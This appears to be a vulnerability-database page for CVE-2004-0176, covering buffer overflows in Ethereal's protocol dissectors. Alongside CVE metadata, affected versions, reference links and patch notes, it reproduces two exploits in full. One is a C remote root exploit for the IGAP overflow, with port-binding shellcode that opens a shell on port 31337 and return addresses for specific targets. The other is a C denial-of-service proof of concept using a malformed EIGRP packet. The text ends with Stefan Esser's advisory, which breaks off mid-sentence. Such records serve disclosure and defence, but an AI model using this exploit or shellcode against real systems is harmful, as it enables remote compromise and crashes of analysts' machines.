CVE-2004-0176
CVSS 5.0
Published: 2004-05-04 00:00:00
Revised: 2016-10-17 22:41:26

[Original] Multiple buffer overflows in Ethereal 0.8.13 to 0.10.2 allow remote attackers to cause a denial of service and possibly execute arbitrary code via the (1) NetFlow, (2) IGAP, (3) EIGRP, (4) PGM, (5) IrDA, (6) BGP, (7) ISUP, or (8) TCAP dissectors.


[CNNVD] Ethereal multiple vulnerabilities (CNNVD-200405-037)

        Ethereal versions 0.8.13 through 0.10.2 contain multiple buffer overflow vulnerabilities. A remote attacker can cause a denial of service and possibly execute arbitrary code via the (1) NetFlow, (2) IGAP, (3) EIGRP, (4) PGM, (5) IrDA, (6) BGP, (7) ISUP, or (8) TCAP dissectors.

- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Access complexity: [--]
Access vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/a:ethereal_group:ethereal:0.8.19
cpe:/a:ethereal_group:ethereal:0.10.2
cpe:/a:ethereal_group:ethereal:0.10.1
cpe:/a:ethereal_group:ethereal:0.9.2
cpe:/a:ethereal_group:ethereal:0.9.1
cpe:/a:ethereal_group:ethereal:0.9.10
cpe:/a:ethereal_group:ethereal:0.9.6
cpe:/a:ethereal_group:ethereal:0.9.11
cpe:/a:ethereal_group:ethereal:0.9.5
cpe:/a:ethereal_group:ethereal:0.9.4
cpe:/a:ethereal_group:ethereal:0.10
cpe:/a:ethereal_group:ethereal:0.9.3
cpe:/a:ethereal_group:ethereal:0.8.13
cpe:/a:ethereal_group:ethereal:0.9.14
cpe:/a:ethereal_group:ethereal:0.8.14
cpe:/a:ethereal_group:ethereal:0.9.15
cpe:/a:ethereal_group:ethereal:0.9.9
cpe:/a:ethereal_group:ethereal:0.9.12
cpe:/a:ethereal_group:ethereal:0.9.8
cpe:/a:ethereal_group:ethereal:0.9
cpe:/a:ethereal_group:ethereal:0.9.13
cpe:/a:ethereal_group:ethereal:0.9.7
cpe:/a:ethereal_group:ethereal:0.8.18
cpe:/a:ethereal_group:ethereal:0.9.16

- OVAL (technical details for detection)

oval:org.mitre.oval:def:887 - Multiple BO Vulnerabilities in Red Hat Enterprise 3 Ethereal
oval:org.mitre.oval:def:878 - Multiple BO Vulnerabilities in Red Hat Ethereal
oval:org.mitre.oval:def:10187 - Multiple buffer overflows in Ethereal 0.8.13 to 0.10.2 allow remote attackers to cause a denial of service and possibly execute arbitrary co...
*OVAL describes in detail how to detect this vulnerability; see the related OVAL definitions for more technical details on detecting it.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0176
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0176
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200405-037
(official data source) CNNVD

- Other links and resources

http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000835
(UNKNOWN)  CONECTIVA  CLA-2004:835
http://marc.info/?l=bugtraq&m=108007072215742&w=2
(UNKNOWN)  BUGTRAQ  20040323 Advisory 03/2004: Multiple (13) Ethereal remote overflows
http://marc.info/?l=bugtraq&m=108058005324316&w=2
(UNKNOWN)  BUGTRAQ  20040329 LNSA-#2004-0007: Multiple security problems in Ethereal
http://marc.info/?l=bugtraq&m=108213710306260&w=2
(UNKNOWN)  BUGTRAQ  20040416 [OpenPKG-SA-2004.015] OpenPKG Security Advisory (ethereal)
http://security.e-matters.de/advisories/032004.html
(UNKNOWN)  MISC  http://security.e-matters.de/advisories/032004.html
http://security.gentoo.org/glsa/glsa-200403-07.xml
(UNKNOWN)  GENTOO  GLSA-200403-07
http://www.debian.org/security/2004/dsa-511
(VENDOR_ADVISORY)  DEBIAN  DSA-511
http://www.ethereal.com/appnotes/enpa-sa-00013.html
(UNKNOWN)  CONFIRM  http://www.ethereal.com/appnotes/enpa-sa-00013.html
http://www.kb.cert.org/vuls/id/119876
(UNKNOWN)  CERT-VN  VU#119876
http://www.kb.cert.org/vuls/id/125156
(UNKNOWN)  CERT-VN  VU#125156
http://www.kb.cert.org/vuls/id/433596
(UNKNOWN)  CERT-VN  VU#433596
http://www.kb.cert.org/vuls/id/591820
(UNKNOWN)  CERT-VN  VU#591820
http://www.kb.cert.org/vuls/id/644886
(UNKNOWN)  CERT-VN  VU#644886
http://www.kb.cert.org/vuls/id/659140
(UNKNOWN)  CERT-VN  VU#659140
http://www.kb.cert.org/vuls/id/740188
(UNKNOWN)  CERT-VN  VU#740188
http://www.kb.cert.org/vuls/id/864884
(UNKNOWN)  CERT-VN  VU#864884
http://www.kb.cert.org/vuls/id/931588
(UNKNOWN)  CERT-VN  VU#931588
http://www.mandriva.com/security/advisories?name=MDKSA-2004:024
(UNKNOWN)  MANDRAKE  MDKSA-2004:024
http://www.redhat.com/support/errata/RHSA-2004-136.html
(UNKNOWN)  REDHAT  RHSA-2004:136
http://www.redhat.com/support/errata/RHSA-2004-137.html
(UNKNOWN)  REDHAT  RHSA-2004:137
http://xforce.iss.net/xforce/xfdb/15569
(VENDOR_ADVISORY)  XF  ethereal-multiple-dissectors-bo(15569)

- Vulnerability information

Ethereal multiple vulnerabilities
Medium severity; buffer overflow
2004-05-04 00:00:00 2005-10-20 00:00:00
Remote / Local
        Ethereal versions 0.8.13 through 0.10.2 contain multiple buffer overflow vulnerabilities. A remote attacker can cause a denial of service and possibly execute arbitrary code via the (1) NetFlow, (2) IGAP, (3) EIGRP, (4) PGM, (5) IrDA, (6) BGP, (7) ISUP, or (8) TCAP dissectors.

- Advisories and patches

        The vendor has released version 0.10.3 to address these issues.
        SGI has released an advisory (20040402-01-U) and a patch to address these issues in SGI ProPack versions 2.3 and 2.4. The vendor has advised that customers apply this patch as soon as possible. Further details regarding obtaining and applying an appropriate patch can be found in the referenced advisory. The patch is linked below.
        Gentoo has released an advisory (GLSA 200403-07) and updates to address these issues. Gentoo users are advised to upgrade to current packages by emerging the updated packages as follows:
        # emerge sync
        # emerge -pv ">=net-analyzer/ethereal-0.10.3"
        # emerge ">=net-analyzer/ethereal-0.10.3"
        Netwosix Linux has released advisory LNSA-#2004-0007 dealing with these issues. Please see the referenced advisory for more information.
        Red Hat has released advisory RHSA-2004:136-09 for Red Hat Enterprise Linux dealing with this issue. Please see the referenced advisory for more information and details on obtaining fixes.
        Red Hat has released advisory RHSA-2004:137-01 dealing with this issue. Please see the referenced advisory for more information and details on obtaining fixes.
        Mandrake has released an advisory that includes updates for this issue.
        Conectiva has released advisory CLSA-2004:835 to address these issues. Please see the advisory in the web references for more details.
        OpenPKG has released advisory OpenPKG-SA-2004.015 and an update dealing with this issue. Please see below for the update, and the referenced advisory for more information.
        SGI has released an advisory (20040506-01-U) with Patch 10075 for SGI ProPack 3 to address these and other issues. Please see the referenced advisory for more information.
        Debian has released advisory DSA 511-1 to address this issue. It is noted that CAN-2004-0176 partially affects Debian woody and that CAN-2004-0367/CAN-2004-0365 do not affect the distribution at all. Please see the attached advisory for more details on obtaining fixes.
        Red Hat has released a Fedora Legacy advisory (FLSA:1840) to address various issues in Ethereal. This advisory fixes these issues in Red Hat Linux 7.3 and 9 running on the i386 architecture. Please see the referenced advisory for more details and information about obtaining fixes.
        Ethereal Group Ethereal 0.10
        Ethereal Group Ethereal 0.10.1
        Ethereal Group Ethereal 0.10.2
        Ethereal Group Ethereal 0.8.13
        Ethereal Group Ethereal 0.8.14
        Ethereal Group Ethereal 0.8.18
        Ethereal Group Ethereal 0.8.19
        Ethereal Group Ethereal 0.9
        Ethereal Group Ethereal 0.9.1
        Ethereal Group Ethereal 0.9.10
        Ethereal Group Ethereal 0.9.11
        Ethereal Group Ethereal 0.9.12
        Ethereal Group Ethereal 0.9.13
        Ethereal Group Ethereal 0.9.14
        Ethereal Group Ethereal 0.9.15
        Ethereal Group Ethereal 0.9.16
        Ethereal Group Ethereal 0.9.2

- Vulnerability information (167)

Ethereal 0.10.0-0.10.2 IGAP Overflow Remote Root Exploit (EDBID:167)
linux remote
2004-03-28 Verified
0 Abhisek Datta
N/A
/* 
 * THE EYE ON SECURITY RESEARCH GROUP - INDIA
 * Ethereal IGAP Dissector Message Overflow Remote Root exploit
 *
 * Copyright 2004 - EOS-India Group
 *
 * Authors note:
 * Shellcode splitting technique:
 * Due to difficulty involved while following normal exploitation techniques due to shortage of memory space
 * for our shellcode, we used the technique of shellcode splitting. In this technique one part of the shellcode
 * is kept before the buffer which overwrites the saved EIP on stack followed by a jmp OFFSET instruction which
 * jumps EIP to the second half of the shellcode which is kept after return address. Also since our shellcode 
 * requires EBP to contain a usuable stack address, we overwrite saved EBP also.
 *
 * Disclaimer:
 * This code is for educational purpose and testing only. The Eye on Security Research Group - India, cannot
 * be held responsible for any damage caused due to misuse of this code.
 * This code is a proof of concept exploit for a serious vulnerability that exists in Ethereal 0.10.0 to
 * Ethereal 0.10.2.
 *
 * Nilanjan De [n2n+linuxmail.org] - Abhisek Datta [abhisek+front.ru]
 * http://www.eos-india.net
 *
*/
#define IPPROTO_IGAP	0x02 // IPPROTO_IGMP=0x02 	
#define PAYLOAD_SIZE	(255-64)	
#define MAX_BUFF	sizeof(struct igap_header)+sizeof(struct ipheader)
#define EXP		"Ethereal(v0.10.0-0.10.2) IGAP Dissector Message Overflow Exploit"
#define VER		"0.2"
#define SOCKET_ERROR	-1
#define MAX_PACKET	10
#define RETOFFSET 	76 
#define SRC_IP		"192.31.33.7"
#include <stdio.h>
#include <signal.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>
#include <signal.h>
#include <netdb.h>

#define MAX_ARCH	5
struct eos{
	char *arch;
	unsigned long ret;
} targets[] = {
	"tEthereal(0.10.2)-Gentoo(gdb)",
	0xbffede50,
	//-------------------------------
	"tEthereal(0.10.2)-Gentoo     ",
	0xbffede10,
	//-------------------------------
	"Ethereal(0.10.2)-Gentoo      ",
	0xbfffd560,
	//-------------------------------
	"tEthereal(0.10.2)-RedHat 8   ",
	0xbffedfb8,
	//-------------------------------
	"Ethereal(0.10.2)-RedHat 8    ",
	0xbfffcd08,
	//-------------------------------
	NULL,
	0
};
	

/*
 x86 linux portbind a shell in port 31337
 based on shellcode from www.shellcode.com.ar
 with a few modifications by us
*/
 
char shellcode_firsthalf[]=
        /* sys_fork() */
	"\x31\xc0"                      // xorl         %eax,%eax
	"\x31\xdb"                      // xorl         %ebx,%ebx
	"\xb0\x02"                      // movb         $0x2,%al
	"\xcd\x80"                      // int          $0x80
	"\x38\xc3"                      // cmpl         %ebx,%eax
	"\x74\x05"                      // je           0x5
	/* sys_exit() */
	"\x8d\x43\x01"                  // leal         0x1(%ebx),%eax
	"\xcd\x80"                      // int          $0x80
        /* setuid(0) */
        "\x31\xc0"                      // xorl         %eax,%eax
        "\x31\xdb"                      // xorl         %ebx,%ebx
        "\xb0\x17"                      // movb         $0x17,%al
        "\xcd\x80"                      // int          $0x80
        /* socket() */
        "\x31\xc0"                      // xorl    %eax,%eax
        "\x89\x45\x10"                  // movl    %eax,0x10(%ebp)(IPPROTO_IP = 0x0)
        "\x40"                          // incl    %eax
        "\x89\xc3"                      // movl    %eax,%ebx(SYS_SOCKET = 0x1)
        "\x89\x45\x0c"                  // movl    %eax,0xc(%ebp)(SOCK_STREAM = 0x1)
        "\x40"                          // incl    %eax
        "\x89\x45\x08"                  // movl    %eax,0x8(%ebp)(AF_INET = 0x2)
	"\x8d\x4d\x08"                  // leal    0x8(%ebp),%ecx
        "\xb0\x66"                      // movb    $0x66,%al
        "\xcd\x80"                      // int     $0x80
        "\x89\x45\x08"                  // movl    %eax,0x8(%ebp)
	;	
char jumpcode[]="\xeb\x10";

char shellcode_secondhalf[]=
        /* bind()*/
        "\x43"                          // incl    %ebx(SYS_BIND = 0x2)
        "\x66\x89\x5d\x14"              // movw    %bx,0x14(%ebp)(AF_INET = 0x2)
	"\x66\xc7\x45\x16\x7a\x69"      // movw    $0x697a,0x16(%ebp)(port=31337)
        "\x31\xd2"                      // xorl    %edx,%edx
        "\x89\x55\x18"                  // movl    %edx,0x18(%ebp)
        "\x8d\x55\x14"                  // leal    0x14(%ebp),%edx
        "\x89\x55\x0c"                  // movl    %edx,0xc(%ebp)
        "\xc6\x45\x10\x10"              // movb    $0x10,0x10(%ebp)(sizeof(struct sockaddr) = 10h = 16)
        "\xb0\x66"                      // movb    $0x66,%al
        "\xcd\x80"                      // int     $0x80
 
        /* listen() */
        "\x40"                          // incl    %eax
        "\x89\x45\x0c"                  // movl    %eax,0xc(%ebp)
        "\x43"                          // incl    %ebx
        "\x43"                          // incl    %ebx(SYS_LISTEN = 0x4)
        "\xb0\x66"                      // movb    $0x66,%al
        "\xcd\x80"                      // int     $0x80
 
        /* accept() */
        "\x43"                          // incl    %ebx
        "\x89\x45\x0c"                  // movl    %eax,0xc(%ebp)
        "\x89\x45\x10"                  // movl    %eax,0x10(%ebp)
        "\xb0\x66"                      // movb    $0x66,%al
        "\xcd\x80"                      // int     $0x80
        "\x89\xc3"                      // movl    %eax,%ebx
 
        /* dup2() */
        "\x31\xc9"                      // xorl    %ecx,%ecx
        "\xb0\x3f"                      // movb    $0x3f,%al
        "\xcd\x80"                      // int     $0x80
        "\x41"                          // incl    %ecx
        "\x80\xf9\x03"                  // cmpb    $0x3,%cl
        "\x75\xf6"                      // jne     -0xa
 
        /* execve() */
        "\x31\xd2"                      // xorl    %edx,%edx
        "\x52"                          // pushl   %edx
        "\x68\x6e\x2f\x73\x68"          // pushl   $0x68732f6e
        "\x68\x2f\x2f\x62\x69"          // pushl   $0x69622f2f
        "\x89\xe3"                      // movl    %esp,%ebx
        "\x52"                          // pushl   %edx
        "\x53"                          // pushl   %ebx
        "\x89\xe1"                      // movl    %esp,%ecx
        "\xb0\x0b"                      // movb    $0xb,%al
        "\xcd\x80";                     // int     $0x80
 
struct ipheader {
	unsigned char ip_hl:4, ip_v:4; 
	unsigned char ip_tos;
	unsigned short int ip_len;
	unsigned short int ip_id;
	unsigned short int ip_off;
	unsigned char ip_ttl;
	unsigned char ip_proto;
	unsigned short int ip_sum;
	unsigned int ip_src;
	unsigned int ip_dst;
};

struct igap_header { 		// This is a malformed header which does not conforms with IGAP RFC
	unsigned char igap_type; 	// Message Type
	unsigned char igap_restime; 	// Response Time
	unsigned short int igap_cksum; 	// IGAP Message Checksum
	unsigned int igap_gaddr; 	// Group Address
	unsigned char igap_ver; 	// Version
	unsigned char igap_stype;	// SubType
	unsigned char igap_reserved1;	// Reserved
	unsigned char igap_cid;		// Challenge ID
	unsigned char igap_asize;	// Account Size
	unsigned char igap_msgsize;	// Message Size
	unsigned short int igap_reserved2;	// Reserved
	/*
	unsigned char igap_uaccount[16];// User Account
	unsigned char igap_message[64]	// Message
	*/
	unsigned char igap_payload[16+64+PAYLOAD_SIZE];	
// This buffer will contain payload, here we differ from RFC by sending a bigger message.
};

unsigned short checksum(unsigned short *buf,int nwords)
{
	unsigned long sum;
	for (sum = 0; nwords > 0; nwords--)
		sum += *(buf)++;
	sum = (sum >> 16) + (sum & 0xffff);
	sum += (sum >> 16);
	return ~sum;
}

void showhelp(char *pr00gie) {
	int i=0;
	printf("######### The Eye on Security Research Group - India ########\n");
	printf("%s %s\n",EXP,VER);
       	printf("abhisek[at]front[dot]ru - n2n[at]linuxmail[dot]org\n");
       	printf("http://www.eos-india.net\n\n");
	printf("[usage]\n");
	printf("%s [Remote Host] [Target]\n",pr00gie);
	printf("[Available Targets]\n");
	while(targets[i].arch != NULL) {
		printf("%d. - %s\t - %p\n",(i),targets[i].arch,targets[i].ret);
		i++;
	}
	exit(1); 
}
	      
int main(int argc,char *argv[]) {
	char buffer[MAX_BUFF];
	struct ipheader *iphdr=(struct ipheader*)buffer;
	struct igap_header *igaphdr=(struct igap_header*)(buffer+sizeof(struct ipheader));
	int sockfd;
	unsigned long addr;
	int one=1;
	int i;
	const int *val=&one;
	struct sockaddr_in sin;
	unsigned long magic;
	unsigned int n;
	
	if(getuid()) {
		printf("- This code opens SOCK_RAW which needs root privilege\n");
		exit(1);
	}
	if(argc != 3)
		showhelp(argv[0]);
	n=atoi(argv[2]);
	if(n >= MAX_ARCH) {
		printf("- Invalid target\n");
		showhelp(argv[0]);
	}
	magic=targets[n].ret;
	printf("-Using RET %p\n",magic);
	addr=inet_addr(argv[1]);
	if(addr==INADDR_NONE) {
		printf("- Invalid target\n");
		exit(1);
	}
	sin.sin_addr.s_addr=addr;
	sin.sin_family=AF_INET;
	sin.sin_port=0x00;
	sockfd=socket(PF_INET,SOCK_RAW,IPPROTO_RAW);
	if(sockfd==SOCKET_ERROR) {
		printf("- Failed creating SOCK_RAW descriptor\n");
		exit(1);
	}
	if(setsockopt(sockfd,IPPROTO_IP,IP_HDRINCL,val,sizeof(one)) < 0)
		printf ("- WARNING !! :Cannot set IP_HDRINCL!\n");
	memset(buffer,0x00,MAX_BUFF);
	// Filling IP Header
	iphdr->ip_hl=0x05;
	iphdr->ip_v=0x04;
	iphdr->ip_tos=0x00;
	iphdr->ip_len=MAX_BUFF;
	iphdr->ip_id=htonl(54321);
	iphdr->ip_off=0x00; // Lower 3 bit=Flag4Fragmentation - Higher 13 Bit=Fragment Offset
	iphdr->ip_ttl=0x01;
	iphdr->ip_proto=IPPROTO_IGAP; // IPPROTO_IGMP
	iphdr->ip_sum=0x00; // Fill sum before sending packet
	iphdr->ip_src=inet_addr (SRC_IP); 
	iphdr->ip_dst=addr;
	// Filling IGAP Header
	igaphdr->igap_type=0x41; // IGAP Membership Query
	igaphdr->igap_restime=0x0a; // 
	igaphdr->igap_cksum=0x00; // compute before sending packet
	igaphdr->igap_gaddr=0x00; // Ignored in IGAP Membership Query Message
	igaphdr->igap_ver=0x01; // IGAPv1
	igaphdr->igap_stype=0x21; // Basic Query
	igaphdr->igap_reserved1=0x00; // Ignored
	igaphdr->igap_cid=0x00; 
	// Challenge ID (ignored because Chanllenge Response authentication not used)		
	igaphdr->igap_asize=0x10; // MAX Size of Account Name Field
	igaphdr->igap_msgsize=0x40+PAYLOAD_SIZE; //  Size of Message	
	igaphdr->igap_reserved2=0x00; // Reserved
	// Building exploit buffer
	//for(i=0;i<16+64+PAYLOAD_SIZE;i++)
	//	memset(igaphdr->igap_payload+i,(unsigned char)i,1);
	memset(igaphdr->igap_payload,0x90,16+64+PAYLOAD_SIZE);
	memcpy(igaphdr->igap_payload+16+RETOFFSET-strlen(shellcode_firsthalf)-8,shellcode_firsthalf,
	strlen(shellcode_firsthalf));
	memcpy(igaphdr->igap_payload+16+64+RETOFFSET-strlen(jumpcode)-4,jumpcode,strlen(jumpcode));
	memcpy(igaphdr->igap_payload+16+64+RETOFFSET,&magic,4);
	magic-=0x10;
	memcpy(igaphdr->igap_payload+16+64+RETOFFSET-4,&magic,4);
	memcpy(igaphdr->igap_payload+16+64+PAYLOAD_SIZE-strlen(shellcode_secondhalf)-1,
                shellcode_secondhalf,strlen(shellcode_secondhalf));
	// Calculating checksum
	igaphdr->igap_cksum=checksum((unsigned short*)(buffer+sizeof(struct ipheader)),
	(sizeof(struct igap_header))>>1);
	iphdr->ip_sum = checksum ((unsigned short*)buffer,(iphdr->ip_len)>>1);
	// Sending
	one=MAX_PACKET;
	while(one) {
		sendto(sockfd,buffer,MAX_BUFF,0,(struct sockaddr*)&sin,sizeof(sin));
		printf(".");
		one--;
	}
	close(sockfd); 
	printf("\n- Send %d packets to %s\n",MAX_PACKET,argv[1]);	
	printf("- Read source to know what to do to check if the exploit worked\n");
	return 0;
}

// milw0rm.com [2004-03-28]
		

- Vulnerability information (170)

Ethereal EIGRP Dissector TLV_IP_INT Long IP Remote DoS Exploit (EDBID:170)
multiple dos
2004-03-26 Verified
0 Rémi Denis-Courmont
N/A
/*
 * Ethereal network protocol analyzer
 * EIGRP Dissector TLV_IP_INT Long IP Address Overflow
 * vulnerability
 * proof of concept code
 * version 1.0 (Mar 26 2004)
 *
 * by Rémi Denis-Courmont < ethereal at simphalampin dot com >
 *   www simphalempin com dev 
 *
 * This vulnerability was found by:
 *   Stefan Esser s.esser e-matters de
 * whose original advisory may be fetched from:
 *   security e-matters de advisories 032004.html
 *
 * Vulnerable:
 *  - Ethereal v0.10.2
 *
 * Not vulnerable:
 *  - Ethereal v0.10.3
 *
 * Note: this code will simply trigger a denial of service on Ethereal.
 * It should really be possible to exploit the buffer overflow
 * (apparently up to 29 bytes overflow), but I haven't tried.
 */


#include <string.h>
#include <stdio.h>

#include <sys/types.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <netdb.h>

static const char packet[] =
        "\x01" /* Version */
        "\x04" /* Opcode: Reply */
        "\x00\x00" /* Checksum (invalid) */
        "\x00\x00\x00\x00" /* Flags */
        "\x00\x00\x00\x00" /* Sequence number */
        "\x00\x00\x00\x00" /* ACK */
        "\x00\x00\x00\x00" /* AS number */

        /* IP internal routes TLV */
        "\x01\x02" /* Type */
        "\x00\x39" /* Length (should be 0x1C) */
        "\x00\x00\x00\x00" /* Next hop */
        "\x00\x00\x00\x00" /* Delay */
        "\x00\x00\x00\x00" /* Bandwidth */
        "\x00\x00\x00" /* MTU */
        "\x00" /* Hop count: directly connected */
        "\xff" /* Reliability: maximum */
        "\x01" /* Load: minimum */
        "\x00\x00" /* Reserved */
        "\xff" /* Prefix length: should be > 0 and <= 32 */
        "\x00\x00\x00" /* Destination network */
        "\xff\xff\xff\xff" "\xff\xff\xff\xff"
        "\xff\xff\xff\xff" "\xff\xff\xff\xff"
        "\xff\xff\xff\xff" "\xff\xff\xff\xff"
        "\xff\xff\xff\xff" "\xff" /* buffer overflow */
;


static int
proof (const struct sockaddr_in *dest)
{
        int fd;
        size_t len;

        fd = socket (PF_INET, SOCK_RAW, 88);
        if (fd == -1)
        {
                perror ("Raw socket error");
                return 1;
        }

        len = sizeof (packet) - 1;
        if (sendto (fd, packet, len, 0, (const struct sockaddr *)dest,
                        sizeof (struct sockaddr_in)) != len)
        {
                perror ("Packet sending error");
                close (fd);
                return 1;
        }

        puts ("Packet sent!");
        close (fd);
        return 0;
}


static int
usage (const char *path)
{
        fprintf (stderr, "Usage: %s <hostname/IP>\n", path);
        return 2;
}


int
main (int argc, char *argv[])
{
        struct sockaddr *dest;

        puts ("Ethereal EIGRP Dissector TLV_IP_INT Long IP Address Overflow\n"
                "proof of concept code\n"
                "Copyright (C) 2004 Rémi Denis-Courmont "
                "<\x65\x74\x68\x65\x72\x65\x61\x6c\x40\x73\x69\x6d\x70"
                "\x68\x61\x6c\x65\x6d\x70\x69\x6e\x2e\x63\x6f\x6d>\n");


        if (argc != 2)
                return usage (argv[0]);
        else
        {
                struct addrinfo help, *res;
                int check;

                memset (&help, 0, sizeof (help));
                help.ai_family = PF_INET;

                check = getaddrinfo (argv[1], NULL, &help, &res);
                if (check)
                {
                        fprintf (stderr, "%s: %s\n", argv[1],
                                        gai_strerror (check));
                        return 1;
                }

                dest = res->ai_addr;
        }

        return proof ((const struct sockaddr_in *)dest);
}		

- Vulnerability information (F32937)

032004.txt (PacketStormID:F32937)
2004-03-24 00:00:00
Stefan Esser  security.e-matters.de
advisory,remote,overflow,arbitrary,code execution
CVE-2004-0176

Ethereal versions 0.8.14 through 0.10.2 were found to be vulnerable to thirteen remote stack overflows during a code audit. The vulnerable dissectors in question are namely: BGP, EIGRP, IGAP, IRDA, ISUP, NetFlow, PGM, TCAP and UCP. Ten of the overflows allow for arbitrary code execution.

e-matters GmbH
                          www.e-matters.de

                      -= Security  Advisory =-



     Advisory: Multiple (13) Ethereal remote overflows
 Release Date: 2004/03/23
Last Modified: 2004/03/23
       Author: Stefan Esser [s.esser@e-matters.de]

  Application: Ethereal 0.8.14 - 0.10.2
     Severity: 13 remotely triggerable vulnerabilities were 
               discovered in the multiprotocol packet sniffer 
               Ethereal that allow remote compromise
         Risk: Critical
Vendor Status: Plans to release a fixed version within this week
    Reference: http://security.e-matters.de/advisories/032004.html


Overview:

   Quote from http://www.ethereal.com
   
   "Ethereal is used by network professionals around the world for 
   troubleshooting, analysis, software and protocol development, and 
   education. It has all of the standard features you would expect in 
   a protocol analyzer, and several features not seen in any other 
   product. Its open source license allows talented experts in the 
   networking community to add enhancements. It runs on all popular 
   computing platforms, including Unix, Linux, and Windows."
   
   During a code audit of Ethereal thirteen remotely triggerable stack
   overflows were discovered. The vulnerable dissectors in question
   are namely: BGP, EIGRP, IGAP, IRDA, ISUP, NetFlow, PGM, TCAP and UCP.
   
   With the exception of 3 all discovered overflows allow arbitrary code
   execution by injecting carefully crafted packets to the sniffed wire
   or by convincing someone to load a malicious packet capture file into
   Ethereal.
   
      
Details:

   In the beginning of March a code audit of Ethereal revealed remotely
   triggerable overflows within a few of the over 400 dissectors. During
   the process of working with the Ethereal vendor the audit continued 
   and until today it was possible to identify a total count of 13 
   possible stack overflows within 9 different dissectors. 
   
   For the purpose of clarity it was chosen to describe all these bugs
   within this advisory instead of spreading the information over nine
   single advisories.
   
   Because the defects affect different parts of the code base and
   were introduced at different dates within the last 3 years the
   following table gives a short overview of the exact CVS commit
   timestamps and the version number it first appeared in.
   
   (Version 0.8.14)
   
   
   [04] EIGRP Dissector TLV_IP_INT Long IP Address Overflow
        - Revision: 1.7, Thu Nov 9 05:16:19 2000 UTC
   
   [05] EIGRP Dissector TLV_IP_EXT Long IP Address Overflow
        - Revision: 1.7, Thu Nov 9 05:16:19 2000 UTC
   
   
   (version 0.8.19)
   
   [06] PGM Dissector NakList Overflow
        - Revision: 1.1, Thu Jul 12 20:16:28 2001 UTC
   
   
   (version 0.9.0)
   
   [11] UCP Dissector Handle String-Field Overflow
        - Revision: 1.1, Mon Oct 8 17:30:23 2001 UTC
   
   [12] UCP Dissector Handle Int-Field Overflow
        - Revision: 1.1, Mon Oct 8 17:30:23 2001 UTC
   
   [13] UCP Dissector Handle Time-Field Overflow
        - Revision: 1.1, Mon Oct 8 17:30:23 2001 UTC
   
   
   (version 0.9.10)
   
   [01] Netflow v9 Dissector Template Caching Overflow
        - Revision 1.9 Tue Mar 4 03:37:12 2003 UTC
   
   
   (version 0.9.16)
   
   [09] ISUP Dissector INTERWORKING FUNCTION ADDRESS Overflow
        - Revision: 1.29, Fri Oct 3 20:58:13 2003 UTC
   
   [10] TCAP Dissector TID Overflow
        - Revision: 1.1, Thu Oct 2 06:13:28 2003 UTC
   
   
   (version 0.10.0)
   
   [02] IGAP Dissector Account Overflow 
        - Revision 1.1 Wed Dec 10 19:21:55 2003 UTC
   
   [03] IGAP Dissector Message Overflow 
        - Revision 1.1 Wed Dec 10 19:21:55 2003 UTC
   
   
   (version 0.10.1)
   
   [08] BGP Dissector MPLS Label Overflow
        - Revision: 1.84, Tue Jan 6 02:29:36 2004 UTC
   
   [07] IRDA Dissector Plugin IRCOM_PORT_NAME Overflow
        - Revision: 1.1, Thu Dec 18 19:07:12 2003 UTC
   
   
   
   In the following paragraphs all 13 bugs are described in a
   short form. The referenced URL within the header of this advisory
   will be updated with more detailed information (incl. snippets)
   when the Ethereal developers have released 0.10.3.

   
   [01] NetFlow v9 Dissector Template Caching Overflow
   ---------------------------------------------------
   
   Desc: When parsing the v9_template structure within a NetFlow
         UDP packet a template_entry count > 64 will overflow
         a stack buffer and allows overwriting the saved instruction
         pointer, thus allowing remote code execution.


   [02] IGAP Protocol Dissector Account Overflow
   [03] IGAP Protocol Dissector Message Overflow
   ---------------------------------------------
   
   Desc: When parsing an IGAP protocol packet that contains either 
         an overlong accountname (>17) or an overlong message (>65)
         different buffers may overflow the stack, allowing an over-
         write of up to 238 (or 190) bytes. In both cases remote 
         code execution exploitation is possible.


   [04] EIGRP Protocol TLV_IP_INT Long IP Address Overflow
   -------------------------------------------------------

   Desc: When parsing an EIGRP IP packet that contains an overlong
         IP address this will overflow a stack buffer and therefore can
         lead to remote code execution

  
   [05] EIGRP Protocol TLV_IP_EXT Long IP Address Overflow
   -------------------------------------------------------

   Desc: When parsing an EIGRP Extended IP packet that contains an 
         overlong extended IP address this will overflow a stack buffer 
         and can lead to remote code execution


   [06] PGM Protocol NakList Overflow
   ----------------------------------

   Desc: When parsing a PGM packet with a carefully crafted NakList
         a possible integer underflow can result in a very small stack
         overflow. Due to the stack layout code execution exploitation
         seems very unlikely.


   [07] IRDA Protocol Plugin IRCOM_PORT_NAME Overflow
   --------------------------------------------------

   Desc: When parsing an IRCOM_PORT_NAME packet an overlong portname
         can overwrite up to 2 bytes on the stack. Similar to [06] the
         stack layout seems to make remote code execution very difficult
         or impossible.
	

   [08] BGP Protocol MPLS Label Overflow
   -------------------------------------
   
   Desc: When parsing a BGP Packet with a MPLS IPv6 label up to 13
         bytes on the stack may be overwritten with arbitrary data.
         Due to the stack layout exploitability seems unlikely and was
         therefore not tested.
      

   [09] ISUP Protocol INTERWORKING FUNCTION ADDRESS Overflow
   ---------------------------------------------------------

   Desc: When parsing an ISUP Packet an oversized IWFA will overflow 
         a stack buffer and can lead to remote code execution


   [10] TCAP Protocol TID Overflow
   -------------------------------
   
   Desc: When handling the ASN.1 encoded Transaction ID within a TCAP
         packet a 4 byte stack variable may overflow and can lead to
         remote code execution


   [11] UCP Protocol Handle String-Field Overflow
   ----------------------------------------------
   
   Desc: When handling a string within an UCP packet a stack buffer 
         of BUFSIZ bytes may overflow and can therefore lead to 
         remote code execution.
         To exploit this vulnerability over the wire an attacker must 
         be able to fit more than BUFSIZ bytes into one TCP packet.
         This means it is only exploitable on the wire if the system
         has a MTU bigger than BUFSIZ. BUFSIZ is 8192 on glibc 
         systems, 1024 on BSD systems and 512 on Windows systems.


   [12] UCP Protocol Handle Int-Field Overflow
   ----------------------------------------------
   
   Desc: When handling an Integer field within an UCP packet a stack
